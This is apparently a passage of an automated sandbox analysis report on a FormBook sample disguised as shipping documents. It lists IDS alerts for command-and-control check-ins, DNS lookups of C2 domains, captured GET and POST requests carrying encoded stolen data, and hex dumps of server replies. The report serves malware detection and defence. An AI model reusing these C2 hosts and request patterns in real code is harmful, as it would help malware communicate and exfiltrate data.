Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49990 -> 203.161.49.193:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50018 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50012 -> 154.23.184.218:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 103.224.182.242:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50012 -> 154.23.184.218:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50017 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50032 -> 199.59.243.227:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50014 -> 31.31.196.17:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 217.76.156.252:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50035 -> 188.114.97.3:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50021 -> 217.76.156.252:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50038 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50019 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50022 -> 217.76.156.252:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 154.23.184.218:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49995 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49995 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50024 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50003 -> 198.252.98.54:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50003 -> 198.252.98.54:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50013 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50020 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50020 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50029 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50029 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50028 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50027 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49991 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50026 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50030 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50037 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50037 -> 188.114.97.3:80
                Source: DNS query: www.huiguang.xyz
                Source: DNS query: www.schedulemassage.xyz
                Source: DNS query: www.030002128.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Joe Sandbox ViewIP Address: 203.161.49.193 203.161.49.193
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.6:49753
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.6:49957
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
                Source: global trafficHTTP traffic detected: GET /hv6g/?SvrLY=3P8lALA&DDp=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGBem8ABx5elB2IpCI9aOC0eTdsykMK9iQYMJsZcXRFR0PJFreT4Q= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.huiguang.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /79tr/?DDp=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&SvrLY=3P8lALA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.beingandbecoming.ltdConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /hxmz/?DDp=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H768cQaPGnwmWpoBoTXnujTk0fw5ooQYelqhpppqeWfG8SjK30Qts=&SvrLY=3P8lALA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.futurevision.lifeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /slxp/?DDp=QrWs1MGbYyQFoq3pAiasxQ0vJYE0z/vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOifcAo6/043Os1binCTsQtgQiE2XfHHikdfzfjKFZR+NqLzPU/Xw=&SvrLY=3P8lALA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.schedulemassage.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /0598/?SvrLY=3P8lALA&DDp=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mcfunding.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /y3dc/?DDp=ihLGZn7rk3oJmiI0qHBJyF4us9aj83dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tREfAnxyZwa91URYeYbxhv5bPljMHSbrvZtVpRz6w5PNfkG2YKS2Ps=&SvrLY=3P8lALA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.migorengya8.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /3m3e/?SvrLY=3P8lALA&DDp=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cD9BPWmhuph4utiW3Dhv00Os4z+1dRn6W+dMqbZ0s1lU/AMvHhe0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.klohk.techConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /rqnz/?DDp=76huNjt+Arc+fPcCbUr8ZcsQaHE6oyRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5j7kTaNGBLKG6O6VRta8dhdFdziPB3CVN6I/2AxSEUg2RCppISrE=&SvrLY=3P8lALA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.d63dm.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /h26k/?DDp=3BjO5l4trS+mOtJOU23IMPLHJrJKWDXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcHbS91xJIfYTkMJziJL2bz2TZCx10rmCstVSToHcp1Wua4EZrnYI=&SvrLY=3P8lALA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.servannto.siteConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ykhz/?DDp=enw3MzdkIinzycog2d+xaWpEHXfvQHhn7Q0Xf9Uq8WeILZ9WFoLyJZQsqpUbcYSzxWL6OSWVl3hVVR/aqS9N6hR069XLEnbGwgzEaDN1WPABKrmY5eDWHUcJ5DCyIOZX0iwQYxg=&SvrLY=3P8lALA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.telforce.oneConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qutj/?SvrLY=3P8lALA&DDp=7+JhtXYoap6hQUSymN1iKxwf+aYIN87BChjykmSFD5cBOLIEN7eTZiNCYJGnmhE2/2tIBPcr+sPRMyccTmjbMYtkzAsmzkJCtDvOtemIhBWnTn54lM+8e5KyjQNsphyX8LHz3fM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.cesach.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /knx2/?DDp=cx1F/qf6XWf+sqaNqgWjpjf2u/FJ3U1rCAFJJdWfl5OjgpHNlJW/Jou+UuCSZllgDcZAwgAs0R21dhdWF/X3usItMGO4lmDkyY4fIJ/HYM1kf3catma7zBplk9C6FFtSionVViQ=&SvrLY=3P8lALA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.030002128.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /geci/?SvrLY=3P8lALA&DDp=OUcUcMiN7UFwaCotsW6AMJwehyiwg2RPC2z6ZMYslxYDHrlwQ88kbad89mN4OjllqHqnU6tumNLMTG1picng1VYsD50x98ZhJyamHAiRPzZYiWViTqiNWtopHV1ePKkjcICWV3I= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.auto-deals-cz-000.buzzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /v58i/?DDp=IC0zr/ZDVxaNAMf8momja46h3KrCsn6WQsgf7AvDnsA3Q4GKUMSc84jsP15lI7VDCiKPTCHe1ALE8uTr9rusPZ5vALoLFqWsTHRljYdsCfeo56EDBh/tAO+VOLzkgSIV0llmzE8=&SvrLY=3P8lALA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bzxs.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/piensasolutions" class="lower" target="_blank" title="S equals www.facebook.com (Facebook)
                Source: global trafficDNS traffic detected: DNS query: www.huiguang.xyz
                Source: global trafficDNS traffic detected: DNS query: www.beingandbecoming.ltd
                Source: global trafficDNS traffic detected: DNS query: www.futurevision.life
                Source: global trafficDNS traffic detected: DNS query: www.schedulemassage.xyz
                Source: global trafficDNS traffic detected: DNS query: www.mcfunding.org
                Source: global trafficDNS traffic detected: DNS query: www.migorengya8.click
                Source: global trafficDNS traffic detected: DNS query: www.klohk.tech
                Source: global trafficDNS traffic detected: DNS query: www.d63dm.top
                Source: global trafficDNS traffic detected: DNS query: www.servannto.site
                Source: global trafficDNS traffic detected: DNS query: www.telforce.one
                Source: global trafficDNS traffic detected: DNS query: www.cesach.net
                Source: global trafficDNS traffic detected: DNS query: www.030002128.xyz
                Source: global trafficDNS traffic detected: DNS query: www.auto-deals-cz-000.buzz
                Source: global trafficDNS traffic detected: DNS query: www.bzxs.info
                Source: global trafficDNS traffic detected: DNS query: www.econsultoria.online
                Source: unknownHTTP traffic detected: POST /79tr/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.beingandbecoming.ltdConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 208Cache-Control: no-cacheOrigin: http://www.beingandbecoming.ltdReferer: http://www.beingandbecoming.ltd/79tr/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36Data Raw: 44 44 70 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 38 74 32 63 56 55 6e 67 47 33 6d 37 43 62 68 33 39 57 50 49 52 36 32 77 2f 55 6d 4b 62 45 69 66 76 6f 5a 79 59 4b 38 48 38 56 68 6f 79 69 64 59 31 63 49 68 64 4c 41 6c 75 57 30 54 69 38 6e 55 65 58 70 51 59 62 39 4e 38 78 39 63 4b 43 4a 74 4b 59 44 50 42 6b 32 63 4d 37 79 68 34 65 55 52 36 2b 71 37 74 32 42 52 4a 48 63 50 4c 63 2f 36 73 38 34 71 6c 41 34 77 4f 6d 73 67 30 43 4a 79 51 4f 4d 63 6e 38 55 52 4d 69 52 56 4d 4f 41 44 4b 30 5a 67 57 35 2b 47 59 36 57 75 36 70 72 6d 2b 68 64 4b 79 4d 36 47 5a 72 64 34 38 62 72 4a 52 41 78 32 38 45 66 35 42 43 54 77 68 37 47 7a Data Ascii: DDp=iDQU2KTRHkQI8t2cVUngG3m7Cbh39WPIR62w/UmKbEifvoZyYK8H8VhoyidY1cIhdLAluW0Ti8nUeXpQYb9N8x9cKCJtKYDPBk2cM7yh4eUR6+q7t2BRJHcPLc/6s84qlA4wOmsg0CJyQOMcn8URMiRVMOADK0ZgW5+GY6Wu6prm+hdKyM6GZrd48brJRAx28Ef5BCTwh7Gz
72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 06 Nov 2024 07:40:56 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 
72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 06 Nov 2024 07:41:01 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 
